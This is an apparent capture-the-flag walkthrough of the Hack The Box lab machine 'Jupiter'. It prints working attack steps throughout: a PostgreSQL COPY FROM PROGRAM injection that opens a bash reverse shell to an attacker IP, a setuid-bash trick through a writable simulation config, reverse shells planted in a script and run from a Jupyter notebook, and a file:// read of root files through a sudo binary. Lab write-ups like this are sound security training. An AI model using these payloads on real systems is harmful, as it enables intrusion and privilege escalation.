Introduction
In this walkthrough, I will go through medium htb box 🙂
Recon
NMAP
As usual there are two ports open 22 and 80.
Let’s visit the site 🙂
Lets add jupiter.htb to our /etc/hosts file .
Enumeration
I used ffuf and found one subdomain kiosk
, add this to /etc/hosts.
Use Burp to visit the kiosk.jupiter.htb & then check the http history 🙂
Now send this request to Repeater 🙂
Advertisement
Change the rawSql param value to
"CREATE TABLE cmd_execd(cmd_output text); COPY cmd_exec FROM PROGRAM 'bash -c \"bash -i >& /dev/tcp/10.10.X.X/4444 0>&1\"'"
Now your modified req will look like this 🙂
Note : Dont forget to start nc listener 🙂
And GG you will get the revshell 🙂
Foothold
Now we have got postgres user
In /dev/shm we can see the .yml file of juno and we have perm to write into it 🙂
Lets upgrade the shell and edit the network-simulation.yml
general:
# stop after 10 simulated seconds
stop_time: 10s
# old versions of cURL use a busy loop, so to avoid spinning in this busy
# loop indefinitely, we add a system call latency to advance the simulated
# time when running non-blocking system calls
model_unblocked_syscall_latency: true
network:
graph:
# use a built-in network graph containing
# a single vertex with a bandwidth of 1 Gbit
type: 1_gbit_switch
hosts:
# a host with the hostname 'server'
server:
network_node_id: 0
processes:
- path: /usr/bin/cp
args: /bin/bash /tmp/bash
start_time: 3s
# three hosts with hostnames 'client1', 'client2', and 'client3'
client:
network_node_id: 0
quantity: 3
processes:
- path: /usr/bin/chmod
args: u+s /tmp/bash
start_time: 5s
After this execute /tmp/bash -p to get the shell as juno
But we cannot read the user.txt because of uid ………………. but there is shadow-simulation.sh file in the home dir . Lets add the revshell to that script.
Our updated shadow-simulation.html will look like this
#!/bin/bash
cd /dev/shm
rm -rf /dev/shm/shadow.data
/home/juno/.local/bin/shadow /dev/shm/*.yml
cp -a /home/juno/shadow/examples/http-server/network-simulation.yml /dev/shm/
bash -i >& /dev/tcp/10.<ip>/4444 0>&1
After getting the shell as juno we can read the user.txt
User – Jovian
If you check the id the cmd you will see that juno belong to science group which gives access to /opt/solar-flares/
Do 'grep -rie token
‘ in /opt/solar-flares/logs/
to find the right token of jupyter in the logs based on date.
lets use chisel to port forward 8888 and use this token
Now lets use that token of the current date 🙂
After getting logged in we can exec cmd in flares.ipynb file
//RUN
import os; os.system('bash -c "bash -i >& /dev/tcp/10.10.<ip>/4444 0>&1"');
After executing it we will get the shell as Jovian
Root
Use sudo -l
to check if there is some binary we can run as root user
Jovian can run /usr/local/bin/sattrack
as root. We can get some infos about this executable by using the strings
tool and then grep the output to see if it calls some config file
strings /usr/local/bin/sattrack | grep -i config
Look for it in the filesystem and copy it in the /tmp
folder
find / -name config.json 2>/dev/null
cp /usr/local/share/sattrack/config.json /tmp
Now by running the sattrack executable as root we can see that it’s able to download in the working directory any file specified in a particular section of the config.json
file. Let’s try to exploit this feature by requesting the root.txt
we want to read.
nano config.json
Find tlesources
section and replace any of the 3 url with file:///root/root.txt
as shown below
"tlesources":[
"file:///root/root.txt",
"http://celestrak.org/NORAD/elements/n...",
"http://celestrak.org/NORAD/elements/g..."
],
Save the new config.json
and simply run sattrack as root. Enjoy the flag!
sudo /usr/local/bin/sattrack
cat /tmp/tle/root.txt
Conclusion
This box is pretty interesting and stressing at the same time, if you have personal instance then no problem 🙂 I would like to rate this box 5/10.
Have a nice day !
Jay Shri Krishna ❤️❤️